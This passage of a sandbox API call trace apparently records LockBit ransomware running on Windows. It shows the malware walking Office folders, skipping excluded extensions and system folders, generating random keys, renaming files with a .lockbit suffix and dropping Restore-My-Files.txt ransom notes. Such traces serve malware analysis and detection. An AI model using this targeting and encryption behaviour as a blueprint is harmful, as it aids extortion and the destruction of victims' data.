pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0210.408] ReadFile (in: hFile=0xec, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0210.412] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\BASIC.HTM.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\BASIC.HTM.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.412] malloc (_Size=0x9a) returned 0x1fab0b8 [0210.412] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fab0b8, Length=0x9a, FileInformationClass=0xa) returned 0xc0000008 [0210.412] free (_Block=0x1fab0b8) [0210.412] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\BASIC.HTM" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Office14\\1033") returned 1 [0210.412] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\Restore-My-Files.txt") returned 69 [0210.412] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0210.412] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d39f900, ftCreationTime.dwHighDateTime=0x1cac1f4, ftLastAccessTime.dwLowDateTime=0xeee1cd90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x1d39f900, ftLastWriteTime.dwHighDateTime=0x1cac1f4, nFileSizeHigh=0x0, nFileSizeLow=0x6180, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCSRuntimeRes.dll", cAlternateFileName="BCSRUN~1.DLL")) returned 1 [0210.412] lstrcmpiW (lpString1=".", lpString2="BCSRuntimeRes.dll") returned -1 [0210.412] lstrcmpiW (lpString1="..", lpString2="BCSRuntimeRes.dll") returned -1 [0210.412] PathFindExtensionW (pszPath="BCSRuntimeRes.dll") returned=".dll" [0210.412] lstrcmpiW (lpString1=".386", lpString2=".dll") returned -1 [0210.412] lstrcmpiW (lpString1=".cmd", lpString2=".dll") returned -1 [0210.412] lstrcmpiW (lpString1=".exe", lpString2=".dll") returned 1 [0210.412] lstrcmpiW (lpString1=".ani", lpString2=".dll") returned -1 [0210.412] lstrcmpiW (lpString1=".adv", lpString2=".dll") returned -1 [0210.412] lstrcmpiW (lpString1=".theme", lpString2=".dll") returned 1 [0210.412] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0210.413] lstrcmpiW (lpString1=".msp", lpString2=".dll") returned 1 [0210.413] lstrcmpiW (lpString1=".com", lpString2=".dll") returned -1 [0210.413] lstrcmpiW (lpString1=".diagpkg", lpString2=".dll") returned -1 [0210.413] lstrcmpiW (lpString1=".nls", lpString2=".dll") returned 1 [0210.413] lstrcmpiW (lpString1=".diagcab", lpString2=".dll") returned -1 [0210.413] lstrcmpiW (lpString1=".lock", lpString2=".dll") returned 1 [0210.413] lstrcmpiW (lpString1=".ocx", lpString2=".dll") returned 1 [0210.413] lstrcmpiW (lpString1=".mpa", lpString2=".dll") returned 1 [0210.413] lstrcmpiW (lpString1=".cpl", lpString2=".dll") returned -1 [0210.413] lstrcmpiW (lpString1=".mod", lpString2=".dll") returned 1 [0210.413] lstrcmpiW (lpString1=".hta", lpString2=".dll") returned 1 [0210.413] lstrcmpiW (lpString1=".icns", lpString2=".dll") returned 1 [0210.413] lstrcmpiW (lpString1=".prf", lpString2=".dll") returned 1 [0210.413] lstrcmpiW (lpString1=".rtp", lpString2=".dll") returned 1 [0210.413] lstrcmpiW (lpString1=".diagcfg", lpString2=".dll") returned -1 [0210.413] lstrcmpiW (lpString1=".msstyles", lpString2=".dll") returned 1 [0210.413] lstrcmpiW (lpString1=".bin", lpString2=".dll") returned -1 [0210.413] lstrcmpiW (lpString1=".hlp", lpString2=".dll") returned 1 [0210.413] lstrcmpiW (lpString1=".shs", lpString2=".dll") returned 1 [0210.413] lstrcmpiW (lpString1=".drv", lpString2=".dll") returned 1 [0210.413] lstrcmpiW (lpString1=".wpx", lpString2=".dll") returned 1 [0210.413] lstrcmpiW (lpString1=".bat", lpString2=".dll") returned -1 [0210.413] lstrcmpiW (lpString1=".rom", lpString2=".dll") returned 1 [0210.413] lstrcmpiW (lpString1=".msc", lpString2=".dll") returned 1 [0210.413] lstrcmpiW (lpString1=".spl", lpString2=".dll") returned 1 [0210.413] lstrcmpiW (lpString1=".ps1", lpString2=".dll") returned 1 [0210.413] lstrcmpiW (lpString1=".msu", lpString2=".dll") returned 1 [0210.413] lstrcmpiW (lpString1=".ics", lpString2=".dll") returned 1 [0210.413] lstrcmpiW (lpString1=".key", lpString2=".dll") returned 1 [0210.413] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0210.413] lstrcmpiW (lpString1=".reg", lpString2=".dll") returned 1 [0210.413] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0210.413] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b056800, ftCreationTime.dwHighDateTime=0x1cab7c9, ftLastAccessTime.dwLowDateTime=0xee2ce510, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x3b056800, ftLastWriteTime.dwHighDateTime=0x1cab7c9, nFileSizeHigh=0x0, nFileSizeLow=0x2778, dwReserved0=0x0, dwReserved1=0x0, cFileName="BHOINTL.DLL", cAlternateFileName="")) returned 1 [0210.413] lstrcmpiW (lpString1=".", lpString2="BHOINTL.DLL") returned -1 [0210.413] lstrcmpiW (lpString1="..", lpString2="BHOINTL.DLL") returned -1 [0210.414] PathFindExtensionW (pszPath="BHOINTL.DLL") returned=".DLL" [0210.414] lstrcmpiW (lpString1=".386", lpString2=".DLL") returned -1 [0210.414] lstrcmpiW (lpString1=".cmd", lpString2=".DLL") returned -1 [0210.414] lstrcmpiW (lpString1=".exe", lpString2=".DLL") returned 1 [0210.414] lstrcmpiW (lpString1=".ani", lpString2=".DLL") returned -1 [0210.414] lstrcmpiW (lpString1=".adv", lpString2=".DLL") returned -1 [0210.414] lstrcmpiW (lpString1=".theme", lpString2=".DLL") returned 1 [0210.414] lstrcmpiW (lpString1=".msi", lpString2=".DLL") returned 1 [0210.414] lstrcmpiW (lpString1=".msp", lpString2=".DLL") returned 1 [0210.414] lstrcmpiW (lpString1=".com", lpString2=".DLL") returned -1 [0210.414] lstrcmpiW (lpString1=".diagpkg", lpString2=".DLL") returned -1 [0210.414] lstrcmpiW (lpString1=".nls", lpString2=".DLL") returned 1 [0210.414] lstrcmpiW (lpString1=".diagcab", lpString2=".DLL") returned -1 [0210.414] lstrcmpiW (lpString1=".lock", lpString2=".DLL") returned 1 [0210.414] lstrcmpiW (lpString1=".ocx", lpString2=".DLL") returned 1 [0210.414] lstrcmpiW (lpString1=".mpa", lpString2=".DLL") returned 1 [0210.414] lstrcmpiW (lpString1=".cpl", lpString2=".DLL") returned -1 [0210.414] lstrcmpiW (lpString1=".mod", lpString2=".DLL") returned 1 [0210.414] lstrcmpiW (lpString1=".hta", lpString2=".DLL") returned 1 [0210.414] lstrcmpiW (lpString1=".icns", lpString2=".DLL") returned 1 [0210.414] lstrcmpiW (lpString1=".prf", lpString2=".DLL") returned 1 [0210.414] lstrcmpiW (lpString1=".rtp", lpString2=".DLL") returned 1 [0210.414] lstrcmpiW (lpString1=".diagcfg", lpString2=".DLL") returned -1 [0210.414] lstrcmpiW (lpString1=".msstyles", lpString2=".DLL") returned 1 [0210.414] lstrcmpiW (lpString1=".bin", lpString2=".DLL") returned -1 [0210.414] lstrcmpiW (lpString1=".hlp", lpString2=".DLL") returned 1 [0210.414] lstrcmpiW (lpString1=".shs", lpString2=".DLL") returned 1 [0210.414] lstrcmpiW (lpString1=".drv", lpString2=".DLL") returned 1 [0210.414] lstrcmpiW (lpString1=".wpx", lpString2=".DLL") returned 1 [0210.414] lstrcmpiW (lpString1=".bat", lpString2=".DLL") returned -1 [0210.414] lstrcmpiW (lpString1=".rom", lpString2=".DLL") returned 1 [0210.414] lstrcmpiW (lpString1=".msc", lpString2=".DLL") returned 1 [0210.414] lstrcmpiW (lpString1=".spl", lpString2=".DLL") returned 1 [0210.414] lstrcmpiW (lpString1=".ps1", lpString2=".DLL") returned 1 [0210.414] lstrcmpiW (lpString1=".msu", lpString2=".DLL") returned 1 [0210.415] lstrcmpiW (lpString1=".ics", lpString2=".DLL") returned 1 [0210.415] lstrcmpiW (lpString1=".key", lpString2=".DLL") returned 1 [0210.415] lstrcmpiW (lpString1=".mp3", lpString2=".DLL") returned 1 [0210.415] lstrcmpiW (lpString1=".reg", lpString2=".DLL") returned 1 [0210.415] lstrcmpiW (lpString1=".dll", lpString2=".DLL") returned 0 [0210.415] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e1bb530, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1e1bb530, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1e1bb530, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bibliography", cAlternateFileName="BIBLIO~1")) returned 1 [0210.415] lstrcmpiW (lpString1=".", lpString2="Bibliography") returned -1 [0210.415] lstrcmpiW (lpString1="..", lpString2="Bibliography") returned -1 [0210.415] lstrcmpiW (lpString1="Bibliography", lpString2="$windows.~bt") returned 1 [0210.415] lstrcmpiW (lpString1="Bibliography", lpString2="intel") returned -1 [0210.415] lstrcmpiW (lpString1="Bibliography", lpString2="msocache") returned -1 [0210.415] lstrcmpiW (lpString1="Bibliography", lpString2="$recycle.bin") returned 1 [0210.415] lstrcmpiW (lpString1="Bibliography", lpString2="$windows.~ws") returned 1 [0210.415] lstrcmpiW (lpString1="Bibliography", lpString2="tor browser") returned -1 [0210.415] lstrcmpiW (lpString1="Bibliography", lpString2="boot") returned -1 [0210.415] lstrcmpiW (lpString1="Bibliography", lpString2="system volume information") returned -1 [0210.415] lstrcmpiW (lpString1="Bibliography", lpString2="perflogs") returned -1 [0210.415] lstrcmpiW (lpString1="Bibliography", lpString2="google") returned -1 [0210.415] lstrcmpiW (lpString1="Bibliography", lpString2="application data") returned 1 [0210.415] lstrcmpiW (lpString1="Bibliography", lpString2="windows") returned -1 [0210.415] lstrcmpiW (lpString1="Bibliography", lpString2="windows.old") returned -1 [0210.415] lstrcmpiW (lpString1="Bibliography", lpString2="appdata") returned 1 [0210.415] lstrcmpiW (lpString1="Bibliography", lpString2="Windows nt") returned -1 [0210.415] lstrcmpiW (lpString1="Bibliography", lpString2="Msbuild") returned -1 [0210.415] lstrcmpiW (lpString1="Bibliography", lpString2="Microsoft") returned -1 [0210.415] lstrcmpiW (lpString1="Bibliography", lpString2="All users") returned 1 [0210.415] lstrcmpiW (lpString1="Bibliography", lpString2="mozilla") returned -1 [0210.415] lstrcmpiW (lpString1="Bibliography", lpString2="Microsoft.NET") returned -1 [0210.415] lstrcmpiW (lpString1="Bibliography", lpString2="microsoft shared") returned -1 [0210.415] lstrcmpiW (lpString1="Bibliography", lpString2="Internet Explorer") returned -1 [0210.415] lstrcmpiW (lpString1="Bibliography", lpString2="common files") returned -1 [0210.415] lstrcmpiW (lpString1="Bibliography", lpString2="opera") returned -1 [0210.415] lstrcmpiW (lpString1="Bibliography", lpString2="Windows Journal") returned -1 [0210.416] wsprintfW (in: param_1=0x3d6b928, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\Bibliography") returned 61 [0210.416] wsprintfW (in: param_1=0x3d6ad00, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\Bibliography\\*") returned 63 [0210.416] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\Bibliography\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6b120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6b120) returned 0x55fe78 [0210.417] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0210.417] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e1bb530, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1e1bb530, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1e1bb530, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0210.417] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0210.417] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0210.417] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b715800, ftCreationTime.dwHighDateTime=0x1c8bfc3, ftLastAccessTime.dwLowDateTime=0x1e1bb530, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1b715800, ftLastWriteTime.dwHighDateTime=0x1c8bfc3, nFileSizeHigh=0x0, nFileSizeLow=0x165e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="BIBFORM.XML", cAlternateFileName="")) returned 1 [0210.417] lstrcmpiW (lpString1=".", lpString2="BIBFORM.XML") returned -1 [0210.417] lstrcmpiW (lpString1="..", lpString2="BIBFORM.XML") returned -1 [0210.417] PathFindExtensionW (pszPath="BIBFORM.XML") returned=".XML" [0210.417] lstrcmpiW (lpString1=".386", lpString2=".XML") returned -1 [0210.418] lstrcmpiW (lpString1=".cmd", lpString2=".XML") returned -1 [0210.418] lstrcmpiW (lpString1=".exe", lpString2=".XML") returned -1 [0210.418] lstrcmpiW (lpString1=".ani", lpString2=".XML") returned -1 [0210.418] lstrcmpiW (lpString1=".adv", lpString2=".XML") returned -1 [0210.418] lstrcmpiW (lpString1=".theme", lpString2=".XML") returned -1 [0210.418] lstrcmpiW (lpString1=".msi", lpString2=".XML") returned -1 [0210.418] lstrcmpiW (lpString1=".msp", lpString2=".XML") returned -1 [0210.418] lstrcmpiW (lpString1=".com", lpString2=".XML") returned -1 [0210.418] lstrcmpiW (lpString1=".diagpkg", lpString2=".XML") returned -1 [0210.418] lstrcmpiW (lpString1=".nls", lpString2=".XML") returned -1 [0210.418] lstrcmpiW (lpString1=".diagcab", lpString2=".XML") returned -1 [0210.418] lstrcmpiW (lpString1=".lock", lpString2=".XML") returned -1 [0210.418] lstrcmpiW (lpString1=".ocx", lpString2=".XML") returned -1 [0210.418] lstrcmpiW (lpString1=".mpa", lpString2=".XML") returned -1 [0210.418] lstrcmpiW (lpString1=".cpl", lpString2=".XML") returned -1 [0210.418] lstrcmpiW (lpString1=".mod", lpString2=".XML") returned -1 [0210.418] lstrcmpiW (lpString1=".hta", lpString2=".XML") returned -1 [0210.418] lstrcmpiW (lpString1=".icns", lpString2=".XML") returned -1 [0210.418] lstrcmpiW (lpString1=".prf", lpString2=".XML") returned -1 [0210.418] lstrcmpiW (lpString1=".rtp", lpString2=".XML") returned -1 [0210.418] lstrcmpiW (lpString1=".diagcfg", lpString2=".XML") returned -1 [0210.418] lstrcmpiW (lpString1=".msstyles", lpString2=".XML") returned -1 [0210.418] lstrcmpiW (lpString1=".bin", lpString2=".XML") returned -1 [0210.418] lstrcmpiW (lpString1=".hlp", lpString2=".XML") returned -1 [0210.418] lstrcmpiW (lpString1=".shs", lpString2=".XML") returned -1 [0210.418] lstrcmpiW (lpString1=".drv", lpString2=".XML") returned -1 [0210.418] lstrcmpiW (lpString1=".wpx", lpString2=".XML") returned -1 [0210.418] lstrcmpiW (lpString1=".bat", lpString2=".XML") returned -1 [0210.418] lstrcmpiW (lpString1=".rom", lpString2=".XML") returned -1 [0210.418] lstrcmpiW (lpString1=".msc", lpString2=".XML") returned -1 [0210.418] lstrcmpiW (lpString1=".spl", lpString2=".XML") returned -1 [0210.418] lstrcmpiW (lpString1=".ps1", lpString2=".XML") returned -1 [0210.418] lstrcmpiW (lpString1=".msu", lpString2=".XML") returned -1 [0210.418] lstrcmpiW (lpString1=".ics", lpString2=".XML") returned -1 [0210.418] lstrcmpiW (lpString1=".key", lpString2=".XML") returned -1 [0210.419] lstrcmpiW (lpString1=".mp3", lpString2=".XML") returned -1 [0210.419] lstrcmpiW (lpString1=".reg", lpString2=".XML") returned -1 [0210.419] lstrcmpiW (lpString1=".dll", lpString2=".XML") returned -1 [0210.419] lstrcmpiW (lpString1=".ini", lpString2=".XML") returned -1 [0210.419] lstrcmpiW (lpString1=".idx", lpString2=".XML") returned -1 [0210.419] lstrcmpiW (lpString1=".sys", lpString2=".XML") returned -1 [0210.419] lstrcmpiW (lpString1=".hlp", lpString2=".XML") returned -1 [0210.419] lstrcmpiW (lpString1=".ico", lpString2=".XML") returned -1 [0210.419] lstrcmpiW (lpString1=".lnk", lpString2=".XML") returned -1 [0210.419] lstrcmpiW (lpString1=".rdp", lpString2=".XML") returned -1 [0210.419] lstrcmpiW (lpString1=".lockbit", lpString2=".XML") returned -1 [0210.419] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BIBFORM.XML") returned 1 [0210.419] lstrcmpiW (lpString1="ntldr", lpString2="BIBFORM.XML") returned 1 [0210.419] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BIBFORM.XML") returned 1 [0210.419] lstrcmpiW (lpString1="bootsect.bak", lpString2="BIBFORM.XML") returned 1 [0210.419] lstrcmpiW (lpString1="autorun.inf", lpString2="BIBFORM.XML") returned -1 [0210.419] lstrcmpiW (lpString1="thumbs.db", lpString2="BIBFORM.XML") returned 1 [0210.419] lstrcmpiW (lpString1="iconcache.db", lpString2="BIBFORM.XML") returned 1 [0210.419] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\Bibliography" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\Bibliography\\") returned="" [0210.419] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\Bibliography\\BIBFORM.XML") returned=".XML" [0210.419] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0210.419] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0210.419] lstrcmpiW (lpString1=".7z", lpString2=".XML") returned -1 [0210.419] lstrcmpiW (lpString1=".ckp", lpString2=".XML") returned -1 [0210.419] lstrcmpiW (lpString1=".dacpac", lpString2=".XML") returned -1 [0210.419] lstrcmpiW (lpString1=".db", lpString2=".XML") returned -1 [0210.419] lstrcmpiW (lpString1=".db-shm", lpString2=".XML") returned -1 [0210.420] lstrcmpiW (lpString1=".db-wal", lpString2=".XML") returned -1 [0210.420] lstrcmpiW (lpString1=".db3", lpString2=".XML") returned -1 [0210.420] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0210.420] lstrcmpiW (lpString1=".dbc", lpString2=".XML") returned -1 [0210.420] lstrcmpiW (lpString1=".dbs", lpString2=".XML") returned -1 [0210.420] lstrcmpiW (lpString1=".dbt", lpString2=".XML") returned -1 [0210.420] lstrcmpiW (lpString1=".dbv", lpString2=".XML") returned -1 [0210.420] lstrcmpiW (lpString1=".frm", lpString2=".XML") returned -1 [0210.420] lstrcmpiW (lpString1=".mdf", lpString2=".XML") returned -1 [0210.420] lstrcmpiW (lpString1=".mrg", lpString2=".XML") returned -1 [0210.420] lstrcmpiW (lpString1=".mwb", lpString2=".XML") returned -1 [0210.420] lstrcmpiW (lpString1=".myd", lpString2=".XML") returned -1 [0210.420] lstrcmpiW (lpString1=".ndf", lpString2=".XML") returned -1 [0210.420] lstrcmpiW (lpString1=".qry", lpString2=".XML") returned -1 [0210.420] lstrcmpiW (lpString1=".sdb", lpString2=".XML") returned -1 [0210.420] lstrcmpiW (lpString1=".sdf", lpString2=".XML") returned -1 [0210.420] lstrcmpiW (lpString1=".sql", lpString2=".XML") returned -1 [0210.420] lstrcmpiW (lpString1=".sqlite", lpString2=".XML") returned -1 [0210.420] lstrcmpiW (lpString1=".sqlite3", lpString2=".XML") returned -1 [0210.420] lstrcmpiW (lpString1=".sqlitedb", lpString2=".XML") returned -1 [0210.420] lstrcmpiW (lpString1=".tmd", lpString2=".XML") returned -1 [0210.420] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\Bibliography\\BIBFORM.XML.lockbit") returned 81 [0210.420] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\Bibliography\\BIBFORM.XML" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\bibliography\\bibform.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0210.422] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0210.422] malloc (_Size=0x40068) returned 0x3df0008 [0210.422] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=91618) returned 1 [0210.422] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.423] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.423] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0210.423] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.423] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.423] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0210.423] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0210.427] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\Bibliography\\BIBFORM.XML.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\Bibliography\\BIBFORM.XML.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.427] malloc (_Size=0xb8) returned 0x1fa2ed8 [0210.427] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb8, FileInformationClass=0xa) returned 0x0 [0210.429] free (_Block=0x1fa2ed8) [0210.429] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\Bibliography\\BIBFORM.XML" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\Bibliography") returned 1 [0210.429] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\Bibliography\\Restore-My-Files.txt") returned 82 [0210.429] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Office14\\1033\\Bibliography\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\bibliography\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0210.430] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0210.431] malloc (_Size=0x40068) returned 0x3df0008 [0210.431] WriteFile (in: hFile=0x308, lpBuffer=0x1fa30f8, nNumberOfBytesToWrite=0x472, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x1fa30f8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0210.432] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b715800, ftCreationTime.dwHighDateTime=0x1c8bfc3, ftLastAccessTime.dwLowDateTime=0x1e1bb530, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1b715800, ftLastWriteTime.dwHighDateTime=0x1c8bfc3, nFileSizeHigh=0x0, nFileSizeLow=0x165e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="BIBFORM.XML", cAlternateFileName="")) returned 0 [0210.432] FindClose (in: hFindFile=0x55fe78 | out: hFindFile=0x55fe78) returned 1 [0210.432] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac531400, ftCreationTime.dwHighDateTime=0x1cab7e5, ftLastAccessTime.dwLowDateTime=0x5067d5c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xac531400, ftLastWriteTime.dwHighDateTime=0x1cab7e5, nFileSizeHigh=0x0, nFileSizeLow=0xb390, dwReserved0=0x0, dwReserved1=0x0, cFileName="BSTORM.VSL", cAlternateFileName="")) returned 1 [0210.432] lstrcmpiW (lpString1=".", lpString2="BSTORM.VSL") returned -1 [0210.432] lstrcmpiW (lpString1="..", lpString2="BSTORM.VSL") returned -1 [0210.432] PathFindExtensionW (pszPath="BSTORM.VSL") returned=".VSL" [0210.432] lstrcmpiW (lpString1=".386", lpString2=".VSL") returned -1 [0210.432] lstrcmpiW (lpString1=".cmd", lpString2=".VSL") returned -1 [0210.432] lstrcmpiW (lpString1=".exe", lpString2=".VSL") returned -1 [0210.432] lstrcmpiW (lpString1=".ani", lpString2=".VSL") returned -1 [0210.432] lstrcmpiW (lpString1=".adv", lpString2=".VSL") returned -1 [0210.432] lstrcmpiW (lpString1=".theme", lpString2=".VSL") returned -1 [0210.432] lstrcmpiW (lpString1=".msi", lpString2=".VSL") returned -1 [0210.432] lstrcmpiW (lpString1=".msp", lpString2=".VSL") returned -1 [0210.432] lstrcmpiW (lpString1=".com", lpString2=".VSL") returned -1 [0210.432] lstrcmpiW (lpString1=".diagpkg", lpString2=".VSL") returned -1 [0210.432] lstrcmpiW (lpString1=".nls", lpString2=".VSL") returned -1 [0210.432] lstrcmpiW (lpString1=".diagcab", lpString2=".VSL") returned -1 [0210.432] lstrcmpiW (lpString1=".lock", lpString2=".VSL") returned -1 [0210.433] lstrcmpiW (lpString1=".ocx", lpString2=".VSL") returned -1 [0210.433] lstrcmpiW (lpString1=".mpa", lpString2=".VSL") returned -1 [0210.433] lstrcmpiW (lpString1=".cpl", lpString2=".VSL") returned -1 [0210.433] lstrcmpiW (lpString1=".mod", lpString2=".VSL") returned -1 [0210.433] lstrcmpiW (lpString1=".hta", lpString2=".VSL") returned -1 [0210.433] lstrcmpiW (lpString1=".icns", lpString2=".VSL") returned -1 [0210.433] lstrcmpiW (lpString1=".prf", lpString2=".VSL") returned -1 [0210.433] lstrcmpiW (lpString1=".rtp", lpString2=".VSL") returned -1 [0210.433] lstrcmpiW (lpString1=".diagcfg", lpString2=".VSL") returned -1 [0210.433] lstrcmpiW (lpString1=".msstyles", lpString2=".VSL") returned -1 [0210.433] lstrcmpiW (lpString1=".bin", lpString2=".VSL") returned -1 [0210.433] lstrcmpiW (lpString1=".hlp", lpString2=".VSL") returned -1 [0210.433] lstrcmpiW (lpString1=".shs", lpString2=".VSL") returned -1 [0210.433] lstrcmpiW (lpString1=".drv", lpString2=".VSL") returned -1 [0210.433] lstrcmpiW (lpString1=".wpx", lpString2=".VSL") returned 1 [0210.433] lstrcmpiW (lpString1=".bat", lpString2=".VSL") returned -1 [0210.433] lstrcmpiW (lpString1=".rom", lpString2=".VSL") returned -1 [0210.433] 